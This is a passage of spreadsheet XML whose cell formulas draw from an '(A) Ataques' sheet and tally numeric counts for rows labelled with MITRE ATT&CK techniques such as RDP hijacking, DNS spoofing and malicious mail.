        <v>0</v>
      </c>
      <c r="BR85" s="471">
        <f>IF('(A) Ataques'!$AP85&lt;&gt;"NO",'(A) Ataques'!OF85,"")</f>
        <v>0</v>
      </c>
      <c r="BS85" s="471">
        <f>IF('(A) Ataques'!$AP85&lt;&gt;"NO",'(A) Ataques'!OJ85,"")</f>
        <v>0</v>
      </c>
      <c r="BT85" s="331">
        <f>IF('(A) Ataques'!$AK85&lt;&gt;"NO",IF($BO85=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="86" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A86" s="79">
        <f t="shared" si="1"/>
        <v>84</v>
      </c>
      <c r="B86" s="4">
        <f>IF('(A) Ataques'!AK86&lt;&gt;"NO",'(A) Ataques'!E86,"")</f>
        <v>55</v>
      </c>
      <c r="C86" s="6" t="str">
        <f>IF('(A) Ataques'!AK86&lt;&gt;"NO",IF('(A) Ataques'!M86="","",'(A) Ataques'!M86),"")</f>
        <v>T1563.002-RDPHijacking</v>
      </c>
      <c r="D86" s="4" t="str">
        <f>IF('(A) Ataques'!AK86&lt;&gt;"NO",'(A) Ataques'!F86,"")</f>
        <v>T1563</v>
      </c>
      <c r="E86" s="286">
        <f>IF('(A) Ataques'!AK86&lt;&gt;"NO",'(A) Ataques'!AQ86,"")</f>
        <v>97</v>
      </c>
      <c r="F86" s="288">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!BB86,"")</f>
        <v>199</v>
      </c>
      <c r="G86" s="392">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!BD86,"")</f>
        <v>43</v>
      </c>
      <c r="H86" s="4">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!BF86,"")</f>
        <v>3</v>
      </c>
      <c r="I86" s="20">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!BG86,"")</f>
        <v>27</v>
      </c>
      <c r="J86" s="530">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",IF($F86=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K86" s="322">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!$BH86,"")</f>
        <v>18</v>
      </c>
      <c r="L86" s="322">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!$BJ86,"")</f>
        <v>18</v>
      </c>
      <c r="M86" s="4">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!$BL86,"")</f>
        <v>2</v>
      </c>
      <c r="N86" s="20">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!$BM86,"")</f>
        <v>17</v>
      </c>
      <c r="O86" s="532">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",IF($K86=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P86" s="292">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!$BN86,"")</f>
        <v>217</v>
      </c>
      <c r="Q86" s="322">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!$BP86,"")</f>
        <v>61</v>
      </c>
      <c r="R86" s="4">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!$BR86,"")</f>
        <v>5</v>
      </c>
      <c r="S86" s="20">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!$BS86,"")</f>
        <v>34</v>
      </c>
      <c r="T86" s="530">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",IF($P86=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U86" s="322">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!$BT86,"")</f>
        <v>228</v>
      </c>
      <c r="V86" s="322">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!$BV86,"")</f>
        <v>67</v>
      </c>
      <c r="W86" s="4">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!$BX86,"")</f>
        <v>11</v>
      </c>
      <c r="X86" s="20">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!$BY86,"")</f>
        <v>36</v>
      </c>
      <c r="Y86" s="532">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",IF($U86=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z86" s="288">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!BZ86,"")</f>
        <v>93</v>
      </c>
      <c r="AA86" s="392">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!CB86,"")</f>
        <v>85</v>
      </c>
      <c r="AB86" s="4">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!CD86,"")</f>
        <v>17</v>
      </c>
      <c r="AC86" s="20">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!CE86,"")</f>
        <v>25</v>
      </c>
      <c r="AD86" s="331">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",IF(Z86=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE86" s="322">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!$CF86,"")</f>
        <v>321</v>
      </c>
      <c r="AF86" s="322">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!$CH86,"")</f>
        <v>152</v>
      </c>
      <c r="AG86" s="4">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!$CJ86,"")</f>
        <v>28</v>
      </c>
      <c r="AH86" s="20">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!$CK86,"")</f>
        <v>42</v>
      </c>
      <c r="AI86" s="287">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",IF($AE86=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ86" s="292">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!$CL86,"")</f>
        <v>0</v>
      </c>
      <c r="AK86" s="322">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!$CN86,"")</f>
        <v>0</v>
      </c>
      <c r="AL86" s="4">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!$CP86,"")</f>
        <v>0</v>
      </c>
      <c r="AM86" s="20">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!$CQ86,"")</f>
        <v>0</v>
      </c>
      <c r="AN86" s="331">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",IF($AJ86=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO86" s="322">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!$CR86,"")</f>
        <v>23</v>
      </c>
      <c r="AP86" s="322">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!$CT86,"")</f>
        <v>18</v>
      </c>
      <c r="AQ86" s="4">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!$CV86,"")</f>
        <v>2</v>
      </c>
      <c r="AR86" s="20">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!$CW86,"")</f>
        <v>18</v>
      </c>
      <c r="AS86" s="287">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",IF($AO86=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT86" s="288">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!CX86,"")</f>
        <v>240</v>
      </c>
      <c r="AU86" s="392">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!CZ86,"")</f>
        <v>79</v>
      </c>
      <c r="AV86" s="4">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!DB86,"")</f>
        <v>7</v>
      </c>
      <c r="AW86" s="20">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",'(A) Ataques'!DC86,"")</f>
        <v>35</v>
      </c>
      <c r="AX86" s="331">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",IF($AT86=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY86" s="469">
        <f>'(A) Ataques'!LU86+'(A) Ataques'!MA86+'(A) Ataques'!MG86+'(A) Ataques'!MM86+'(A) Ataques'!MS86</f>
        <v>16</v>
      </c>
      <c r="AZ86" s="510">
        <f>'(A) Ataques'!LW86+'(A) Ataques'!MC86+'(A) Ataques'!MI86+'(A) Ataques'!MO86+'(A) Ataques'!MU86</f>
        <v>16</v>
      </c>
      <c r="BA86" s="471">
        <f>'(A) Ataques'!LY86+'(A) Ataques'!ME86+'(A) Ataques'!MK86+'(A) Ataques'!MQ86+'(A) Ataques'!MW86</f>
        <v>1</v>
      </c>
      <c r="BB86" s="471">
        <f>'(A) Ataques'!LQ86</f>
        <v>16</v>
      </c>
      <c r="BC86" s="331">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",IF($AY86=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD86" s="469">
        <f>IF('(A) Ataques'!$AP86&lt;&gt;"NO",'(A) Ataques'!LL86,"")</f>
        <v>107</v>
      </c>
      <c r="BE86" s="510">
        <f>IF('(A) Ataques'!$AP86&lt;&gt;"NO",'(A) Ataques'!LM86,"")</f>
        <v>106</v>
      </c>
      <c r="BF86" s="471">
        <f>IF('(A) Ataques'!$AP86&lt;&gt;"NO",'(A) Ataques'!LN86,"")</f>
        <v>1</v>
      </c>
      <c r="BG86" s="471">
        <f>IF('(A) Ataques'!$AP86&lt;&gt;"NO",'(A) Ataques'!LO86,"")</f>
        <v>12</v>
      </c>
      <c r="BH86" s="471">
        <f>IF('(A) Ataques'!$AP86&lt;&gt;"NO",'(A) Ataques'!LS86,"")</f>
        <v>89</v>
      </c>
      <c r="BI86" s="331">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",IF($BD86=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ86" s="469">
        <f>'(A) Ataques'!OL86+'(A) Ataques'!OR86+'(A) Ataques'!OX86+'(A) Ataques'!PD86+'(A) Ataques'!PJ86</f>
        <v>4</v>
      </c>
      <c r="BK86" s="510">
        <f>'(A) Ataques'!ON86+'(A) Ataques'!OT86+'(A) Ataques'!OZ86+'(A) Ataques'!PF86+'(A) Ataques'!PL86</f>
        <v>4</v>
      </c>
      <c r="BL86" s="471">
        <f>'(A) Ataques'!OP86+'(A) Ataques'!OV86+'(A) Ataques'!PB86+'(A) Ataques'!PH86+'(A) Ataques'!PN86</f>
        <v>1</v>
      </c>
      <c r="BM86" s="495">
        <f>'(A) Ataques'!OH86</f>
        <v>4</v>
      </c>
      <c r="BN86" s="331">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",IF($BJ86=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO86" s="469">
        <f>IF('(A) Ataques'!$AP86&lt;&gt;"NO",'(A) Ataques'!OC86,"")</f>
        <v>4</v>
      </c>
      <c r="BP86" s="510">
        <f>IF('(A) Ataques'!$AP86&lt;&gt;"NO",'(A) Ataques'!OD86,"")</f>
        <v>4</v>
      </c>
      <c r="BQ86" s="471">
        <f>IF('(A) Ataques'!$AP86&lt;&gt;"NO",'(A) Ataques'!OE86,"")</f>
        <v>1</v>
      </c>
      <c r="BR86" s="471">
        <f>IF('(A) Ataques'!$AP86&lt;&gt;"NO",'(A) Ataques'!OF86,"")</f>
        <v>1</v>
      </c>
      <c r="BS86" s="471">
        <f>IF('(A) Ataques'!$AP86&lt;&gt;"NO",'(A) Ataques'!OJ86,"")</f>
        <v>4</v>
      </c>
      <c r="BT86" s="331">
        <f>IF('(A) Ataques'!$AK86&lt;&gt;"NO",IF($BO86=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="87" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A87" s="79">
        <f t="shared" si="1"/>
        <v>85</v>
      </c>
      <c r="B87" s="4">
        <f>IF('(A) Ataques'!AK87&lt;&gt;"NO",'(A) Ataques'!E87,"")</f>
        <v>56</v>
      </c>
      <c r="C87" s="6" t="str">
        <f>IF('(A) Ataques'!AK87&lt;&gt;"NO",IF('(A) Ataques'!M87="","",'(A) Ataques'!M87),"")</f>
        <v>T1565.002-DNS_spoofing</v>
      </c>
      <c r="D87" s="4" t="str">
        <f>IF('(A) Ataques'!AK87&lt;&gt;"NO",'(A) Ataques'!F87,"")</f>
        <v>T1565</v>
      </c>
      <c r="E87" s="286">
        <f>IF('(A) Ataques'!AK87&lt;&gt;"NO",'(A) Ataques'!AQ87,"")</f>
        <v>1</v>
      </c>
      <c r="F87" s="288">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!BB87,"")</f>
        <v>0</v>
      </c>
      <c r="G87" s="392">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!BD87,"")</f>
        <v>0</v>
      </c>
      <c r="H87" s="4">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!BF87,"")</f>
        <v>0</v>
      </c>
      <c r="I87" s="20">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!BG87,"")</f>
        <v>0</v>
      </c>
      <c r="J87" s="530">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",IF($F87=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K87" s="322">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!$BH87,"")</f>
        <v>0</v>
      </c>
      <c r="L87" s="322">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!$BJ87,"")</f>
        <v>0</v>
      </c>
      <c r="M87" s="4">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!$BL87,"")</f>
        <v>0</v>
      </c>
      <c r="N87" s="20">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!$BM87,"")</f>
        <v>0</v>
      </c>
      <c r="O87" s="532">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",IF($K87=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P87" s="292">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!$BN87,"")</f>
        <v>0</v>
      </c>
      <c r="Q87" s="322">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!$BP87,"")</f>
        <v>0</v>
      </c>
      <c r="R87" s="4">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!$BR87,"")</f>
        <v>0</v>
      </c>
      <c r="S87" s="20">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!$BS87,"")</f>
        <v>0</v>
      </c>
      <c r="T87" s="530">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",IF($P87=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="U87" s="322">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!$BT87,"")</f>
        <v>1</v>
      </c>
      <c r="V87" s="322">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!$BV87,"")</f>
        <v>1</v>
      </c>
      <c r="W87" s="4">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!$BX87,"")</f>
        <v>1</v>
      </c>
      <c r="X87" s="20">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!$BY87,"")</f>
        <v>1</v>
      </c>
      <c r="Y87" s="532">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",IF($U87=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z87" s="288">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!BZ87,"")</f>
        <v>4</v>
      </c>
      <c r="AA87" s="392">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!CB87,"")</f>
        <v>2</v>
      </c>
      <c r="AB87" s="4">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!CD87,"")</f>
        <v>2</v>
      </c>
      <c r="AC87" s="20">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!CE87,"")</f>
        <v>1</v>
      </c>
      <c r="AD87" s="331">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",IF(Z87=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE87" s="322">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!$CF87,"")</f>
        <v>5</v>
      </c>
      <c r="AF87" s="322">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!$CH87,"")</f>
        <v>3</v>
      </c>
      <c r="AG87" s="4">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!$CJ87,"")</f>
        <v>3</v>
      </c>
      <c r="AH87" s="20">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!$CK87,"")</f>
        <v>1</v>
      </c>
      <c r="AI87" s="287">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",IF($AE87=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ87" s="292">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!$CL87,"")</f>
        <v>0</v>
      </c>
      <c r="AK87" s="322">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!$CN87,"")</f>
        <v>0</v>
      </c>
      <c r="AL87" s="4">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!$CP87,"")</f>
        <v>0</v>
      </c>
      <c r="AM87" s="20">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!$CQ87,"")</f>
        <v>0</v>
      </c>
      <c r="AN87" s="331">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",IF($AJ87=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO87" s="322">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!$CR87,"")</f>
        <v>0</v>
      </c>
      <c r="AP87" s="322">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!$CT87,"")</f>
        <v>0</v>
      </c>
      <c r="AQ87" s="4">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!$CV87,"")</f>
        <v>0</v>
      </c>
      <c r="AR87" s="20">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!$CW87,"")</f>
        <v>0</v>
      </c>
      <c r="AS87" s="287">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",IF($AO87=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT87" s="288">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!CX87,"")</f>
        <v>0</v>
      </c>
      <c r="AU87" s="392">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!CZ87,"")</f>
        <v>0</v>
      </c>
      <c r="AV87" s="4">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!DB87,"")</f>
        <v>0</v>
      </c>
      <c r="AW87" s="20">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",'(A) Ataques'!DC87,"")</f>
        <v>0</v>
      </c>
      <c r="AX87" s="331">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",IF($AT87=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AY87" s="469">
        <f>'(A) Ataques'!LU87+'(A) Ataques'!MA87+'(A) Ataques'!MG87+'(A) Ataques'!MM87+'(A) Ataques'!MS87</f>
        <v>0</v>
      </c>
      <c r="AZ87" s="510">
        <f>'(A) Ataques'!LW87+'(A) Ataques'!MC87+'(A) Ataques'!MI87+'(A) Ataques'!MO87+'(A) Ataques'!MU87</f>
        <v>0</v>
      </c>
      <c r="BA87" s="471">
        <f>'(A) Ataques'!LY87+'(A) Ataques'!ME87+'(A) Ataques'!MK87+'(A) Ataques'!MQ87+'(A) Ataques'!MW87</f>
        <v>0</v>
      </c>
      <c r="BB87" s="471">
        <f>'(A) Ataques'!LQ87</f>
        <v>0</v>
      </c>
      <c r="BC87" s="331">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",IF($AY87=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD87" s="469">
        <f>IF('(A) Ataques'!$AP87&lt;&gt;"NO",'(A) Ataques'!LL87,"")</f>
        <v>1</v>
      </c>
      <c r="BE87" s="510">
        <f>IF('(A) Ataques'!$AP87&lt;&gt;"NO",'(A) Ataques'!LM87,"")</f>
        <v>1</v>
      </c>
      <c r="BF87" s="471">
        <f>IF('(A) Ataques'!$AP87&lt;&gt;"NO",'(A) Ataques'!LN87,"")</f>
        <v>0</v>
      </c>
      <c r="BG87" s="471">
        <f>IF('(A) Ataques'!$AP87&lt;&gt;"NO",'(A) Ataques'!LO87,"")</f>
        <v>1</v>
      </c>
      <c r="BH87" s="471">
        <f>IF('(A) Ataques'!$AP87&lt;&gt;"NO",'(A) Ataques'!LS87,"")</f>
        <v>1</v>
      </c>
      <c r="BI87" s="331">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",IF($BD87=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ87" s="469">
        <f>'(A) Ataques'!OL87+'(A) Ataques'!OR87+'(A) Ataques'!OX87+'(A) Ataques'!PD87+'(A) Ataques'!PJ87</f>
        <v>0</v>
      </c>
      <c r="BK87" s="510">
        <f>'(A) Ataques'!ON87+'(A) Ataques'!OT87+'(A) Ataques'!OZ87+'(A) Ataques'!PF87+'(A) Ataques'!PL87</f>
        <v>0</v>
      </c>
      <c r="BL87" s="471">
        <f>'(A) Ataques'!OP87+'(A) Ataques'!OV87+'(A) Ataques'!PB87+'(A) Ataques'!PH87+'(A) Ataques'!PN87</f>
        <v>0</v>
      </c>
      <c r="BM87" s="495">
        <f>'(A) Ataques'!OH87</f>
        <v>0</v>
      </c>
      <c r="BN87" s="331">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",IF($BJ87=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO87" s="469">
        <f>IF('(A) Ataques'!$AP87&lt;&gt;"NO",'(A) Ataques'!OC87,"")</f>
        <v>0</v>
      </c>
      <c r="BP87" s="510">
        <f>IF('(A) Ataques'!$AP87&lt;&gt;"NO",'(A) Ataques'!OD87,"")</f>
        <v>0</v>
      </c>
      <c r="BQ87" s="471">
        <f>IF('(A) Ataques'!$AP87&lt;&gt;"NO",'(A) Ataques'!OE87,"")</f>
        <v>0</v>
      </c>
      <c r="BR87" s="471">
        <f>IF('(A) Ataques'!$AP87&lt;&gt;"NO",'(A) Ataques'!OF87,"")</f>
        <v>0</v>
      </c>
      <c r="BS87" s="471">
        <f>IF('(A) Ataques'!$AP87&lt;&gt;"NO",'(A) Ataques'!OJ87,"")</f>
        <v>0</v>
      </c>
      <c r="BT87" s="331">
        <f>IF('(A) Ataques'!$AK87&lt;&gt;"NO",IF($BO87=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="88" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A88" s="79">
        <f t="shared" si="1"/>
        <v>86</v>
      </c>
      <c r="B88" s="4">
        <f>IF('(A) Ataques'!AK88&lt;&gt;"NO",'(A) Ataques'!E88,"")</f>
        <v>57</v>
      </c>
      <c r="C88" s="6" t="str">
        <f>IF('(A) Ataques'!AK88&lt;&gt;"NO",IF('(A) Ataques'!M88="","",'(A) Ataques'!M88),"")</f>
        <v>T1566.001-Malicious_mail</v>
      </c>
      <c r="D88" s="4" t="str">
        <f>IF('(A) Ataques'!AK88&lt;&gt;"NO",'(A) Ataques'!F88,"")</f>
        <v>T1566</v>
      </c>
      <c r="E88" s="286">
        <f>IF('(A) Ataques'!AK88&lt;&gt;"NO",'(A) Ataques'!AQ88,"")</f>
        <v>2</v>
      </c>
      <c r="F88" s="288">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!BB88,"")</f>
        <v>1194</v>
      </c>
      <c r="G88" s="392">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!BD88,"")</f>
        <v>4</v>
      </c>
      <c r="H88" s="4">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!BF88,"")</f>
        <v>2</v>
      </c>
      <c r="I88" s="20">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!BG88,"")</f>
        <v>2</v>
      </c>
      <c r="J88" s="530">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",IF($F88=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K88" s="322">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!$BH88,"")</f>
        <v>0</v>
      </c>
      <c r="L88" s="322">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!$BJ88,"")</f>
        <v>0</v>
      </c>
      <c r="M88" s="4">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!$BL88,"")</f>
        <v>0</v>
      </c>
      <c r="N88" s="20">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!$BM88,"")</f>
        <v>0</v>
      </c>
      <c r="O88" s="532">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",IF($K88=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P88" s="292">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!$BN88,"")</f>
        <v>1194</v>
      </c>
      <c r="Q88" s="322">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!$BP88,"")</f>
        <v>4</v>
      </c>
      <c r="R88" s="4">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!$BR88,"")</f>
        <v>2</v>
      </c>
      <c r="S88" s="20">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!$BS88,"")</f>
        <v>2</v>
      </c>
      <c r="T88" s="530">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",IF($P88=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U88" s="322">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!$BT88,"")</f>
        <v>1197</v>
      </c>
      <c r="V88" s="322">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!$BV88,"")</f>
        <v>6</v>
      </c>
      <c r="W88" s="4">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!$BX88,"")</f>
        <v>4</v>
      </c>
      <c r="X88" s="20">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!$BY88,"")</f>
        <v>2</v>
      </c>
      <c r="Y88" s="532">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",IF($U88=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z88" s="288">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!BZ88,"")</f>
        <v>20</v>
      </c>
      <c r="AA88" s="392">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!CB88,"")</f>
        <v>3</v>
      </c>
      <c r="AB88" s="4">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!CD88,"")</f>
        <v>2</v>
      </c>
      <c r="AC88" s="20">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!CE88,"")</f>
        <v>2</v>
      </c>
      <c r="AD88" s="331">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",IF(Z88=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE88" s="322">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!$CF88,"")</f>
        <v>1217</v>
      </c>
      <c r="AF88" s="322">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!$CH88,"")</f>
        <v>9</v>
      </c>
      <c r="AG88" s="4">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!$CJ88,"")</f>
        <v>6</v>
      </c>
      <c r="AH88" s="20">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!$CK88,"")</f>
        <v>2</v>
      </c>
      <c r="AI88" s="287">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",IF($AE88=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ88" s="292">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!$CL88,"")</f>
        <v>0</v>
      </c>
      <c r="AK88" s="322">
